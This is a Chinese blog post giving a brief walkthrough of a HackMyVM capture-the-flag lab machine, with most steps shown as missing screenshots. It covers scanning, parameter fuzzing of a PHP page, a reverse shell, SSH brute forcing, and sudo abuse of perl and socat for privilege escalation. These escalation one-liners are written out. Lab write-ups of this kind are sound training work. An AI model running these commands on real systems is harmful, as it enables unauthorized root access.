靶机渗透日记

最新推荐文章于 2024-08-16 10:05:19 发布
最新推荐文章于 2024-08-16 10:05:19 发布
阅读量168 收藏
点赞数
文章标签: 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/123231733
版权

  1. IP

  2. 端口

    在这里插入图片描述

  3. 访问 80 端口

    在这里插入图片描述

    在这里插入图片描述

    发现是 wordpress 主题

  4. 目录扫描

    在这里插入图片描述

    只有一个 index.html

  5. 查看网页源代码

    在这里插入图片描述

    查阅资料得知上面的 html 页面是一种加密方式,需要对其解密,密码格式如源码中显示

    在这里插入图片描述

    得到 sys.hidden.hmv

  6. 访问该域名

    在这里插入图片描述

  7. 目录扫描

    在这里插入图片描述

    发现了三个目录,依次对目录进行扫描,最终再 /weapon 目录下发现 loot.php

  8. 访问该页面发现是空白,猜测有文件包含或者有参数

    ffuf -u http://sys.hidden.hmv/weapon/loot.php?FUZZ=id -w big.txt -t 500 -fs 0

    在这里插入图片描述这里爆 /etc/passwd 没有结果…

    在这里插入图片描述

  9. 反弹shell

    在这里插入图片描述

    可以以 toreto 用户运行 prel

    在这里插入图片描述

    sudo -u toreto /usr/bin/perl -e 'exec "/bin/bash";'

    返回 toreto 用户 shell

  10. 在 /home/atenea 目录下发现一个字典,对该用户进行ssh爆破

    在这里插入图片描述

  11. 切换到 atenea 用户,发现可以以 root 用户运行 socat

    sudo socat stdin exec:/bin/sh

    在这里插入图片描述

# .
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试常用工具
weixin_51151193的博客
12-29 2265
渗透测试常用工具总结
靶机渗透日记 messages
Anonymous
02-26 368
IP 端口 访问 80 端口 两个功能点,一个是 chatbot ,一个是 Webmail 对这两部分进行目录扫描 发现在 /chatbot 目录下存在 后台登陆页面 寻找源码,关键字 Simple ChatBot Application 得到后台的默认密码,成功访问 登录到后台发现可以上传头像,上传一个 webshell ,这里上传一句话发现怎么都无法连接,并且我只能上传到 user_avatar ,上传到 bot_avatar 上会变成 jsp 后缀文件 在 /h..
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Animetronic - hackmyvm
tanbinn的博客
08-12 469
hackmyvm的Animetronic靶场
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 429
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 316
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 147
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
如何选择较为安全的第三方依赖版本?
最新发布
极客星云-CSDN博客
08-16 43
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
企业如何组建安全稳定的跨国通信网络
TIANGEKUAJING的博客
08-13 241
当企业在海外设有分公司时,如何建立一个安全且稳定的跨国通信网络是一个关键问题。为了确保跨国通信的安全和稳定性,可以考虑以下几种方案。
Scout Suite:开源云安全审计工具
网络研究观
08-12 336
Scout Suite 是一个开源、多云安全审计工具,旨在评估云环境的安全态势。
安全自动化和编排:如何使用自动化工具和编排技术来提高安全操作效率。(第二篇)
艰难的活着
08-13 983
深入理解Kubernetes环境中的安全自动化与编排(第二篇)
Linux安全与高级应用(十二)深入探讨Linux系统中的YUM仓库服务与PXE网络装机
洛秋的博客
08-12 1152
YUM(Yellowdog Updater Modified)是基于RPM包管理的一种软件更新机制,它能够自动解决软件包之间的依赖关系,并且所有的软件包都来自集中的YUM仓库。YUM仓库是一种存储RPM包的集合,可以通过多种方式(如FTP、HTTP或本地目录)提供给客户机,客户机可以通过配置YUM仓库位置来获取和安装所需的软件包。YUM仓库服务与PXE网络装机是Linux系统管理中的两个关键技术,通过它们,管理员可以高效地管理软件包和进行大规模的系统部署。这不仅提高了工作效率,也增强了系统的稳定性和安全性。
文件上传-.htaccess利用
feiwujiushiwo的博客
08-13 391
限于Apache.htaccess文件是服务器中的一个配置文件,它负责相关目录下的网页配置。笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
守护数字堡垒:全面掌握安全配置管理
2401_85761762的博客
08-13 622
安全配置管理是确保系统安全的重要环节。通过本文的详细介绍,读者应该对SCM有了全面的认识。实施有效的SCM策略,可以帮助组织降低安全风险,提高系统稳定性和合规性。通过本文,我们提供了一个全面的指南,帮助读者理解SCM的概念、重要性以及如何在实践中应用SCM。记住,持续的监控和改进是确保SCM成功的关键。
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值